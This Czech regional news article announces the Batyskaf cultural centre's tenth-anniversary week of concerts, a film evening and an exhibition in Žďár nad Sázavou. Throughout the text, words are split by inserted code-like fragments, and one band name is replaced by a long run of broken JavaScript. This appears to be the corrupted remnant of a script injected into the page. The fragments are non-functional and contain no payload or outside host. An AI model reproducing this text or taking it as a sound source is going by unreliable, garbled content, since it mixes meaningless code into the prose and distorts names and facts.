Žďár nad Sázavou, zdar nad sazavou, aktuality, kultura, Batyskaf
Rainbow page separator

Batyskaf – kultura v kostce – oslaví 10. narozeniny

Pátek, 26. října 2012

uf1-batyskafŽďár nad Sázavou. „Kultura v kostce“, jak se taky Kulturním centru Batyskaf někdy přezdívá, se v těch[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}to dnech chystá na realizaci oslav 10-tého výročí od prvního otevření pro veřejnost. A jak jinak lze oslavit takové[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}to jubileum než právě hudbou, promítáním záznamů z úspěšných akcí nebo třeba výtvarnou výstavou. Deset let patřily ty[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}to akce mezi hlavní aktivity žďárského kulturního centra a nyní se v rámci jednoho narozeninového týdne nabízí hned ve čtyřech kulturních setkáních.

uf4-batyskafPrvní koncert ve žďárském kulturním centru Batyskaf proběhl přesně 1.lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}topadu 2002. Klub tehdy pokřtila mimo jiné také brněnská alternativní formace Radium.nfo. Od té doby se v pros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}torách kulturního centra, ale i mimo něj, podařilo uspořádat více než 240 nejrůznějších koncertů, realizovalo se zde téměř 100 výtvarných výstav a s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}tovky dalších drobnějších akcí. Kulturní centrum se tak stalo nepřehlédnutelnou „štikou“ ve žďárském kulturním „rybníčku“. V rámci narozeninového týdne je tedy na co vzpomínat.

„V týdnu na přelomu října a lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}topadu proběhnou hned 4 večery věnované oslavám,“ přibližuje program oslav dramaturg Batyskafu Aleš Kostečka a dodává: „V neděli 28. října začneme zlehka filmovým večerem, který k neděli v Batyskafu prostě patří. Ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}tokrát se podíváme na snímky, které vznikly buď přímo v Batyskafu, nebo díky jeho partnerství. Uvidíme snowboardové závody v Novém Jimramově, pořad Kapely na Vysočině nebo třeba návštěvu Pavla Bobka při oslavách osmých narozenin Batyskafu.“

uf2-a-ucce-batyskafV úterý 30. října najdeme v narozeninovém programu podvečer věnovaný vokálním uskupením. Představí se žďárská vokální parta C-Vox, jejíž jednotliví členové [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}toho v Batyskafu na pódiu zažili opravdu dost. A aby tam nebyli sami, přizvali si ještě brněnskou dámskou kapelu 4tetky. „Celý večer má benefiční nádech s tím, že vybrané peníze půjdou na účet našeho zdravotně postiženého kamaráda u Konta Bariéry,“ upozorňuje v té[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}to souvislosti Aleš Kostečka.

Dalším vrcholem oslav bude koncert jazzovo – bluesové formace  MiniMAXb=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];(=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}{if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}=function(n){if ( () == „string“) ; };.list=[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}); if (c==3){ ;}{if ( () == „string“) };[„\’//\’=“];({if ( () == „string“) };[„\’//\’=“]; { ;}); { ;}{if ( () == „string“) };[„\’//\’=“]; { ;}and, který proběhne ve čtvrtek 1. lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}topadu, tedy přesně 10 let od prvního otevření klubu. Závěrečný večer narozeninového týdne pak přivítá legendární pražskou hudební formaci UNITED FLAVOUR, která ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}tokrát přijede i s poněkud exotickým zpěvákem a raperem. Ten si nechá říkat UCEE a pochází z Egypta. Koncert, který se uskuteční v sobotu 3. lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}topadu je již vyprodán. Pár lístků bude možná uvolněno těsně před koncertem.

Narozeninové večery budou však probíhat nejenom přímo u oslavenců. Celý měsíc lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}topad budou ve žďárském Městském divadle vystavovat takzvaní Podzemníci. Je [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}to souborná expozice výtvarníků, kteří prošli právě výstavním sálem kulturního centra Batyskaf, a kteří se tak představí i širšímu publiku. (blk)

———————–

Vrcholem narozeninového týdne bude koncert známé pražské formace United Flavour společně se známým rapperem a zpěvákem egyptského původu, který si říká UCEE.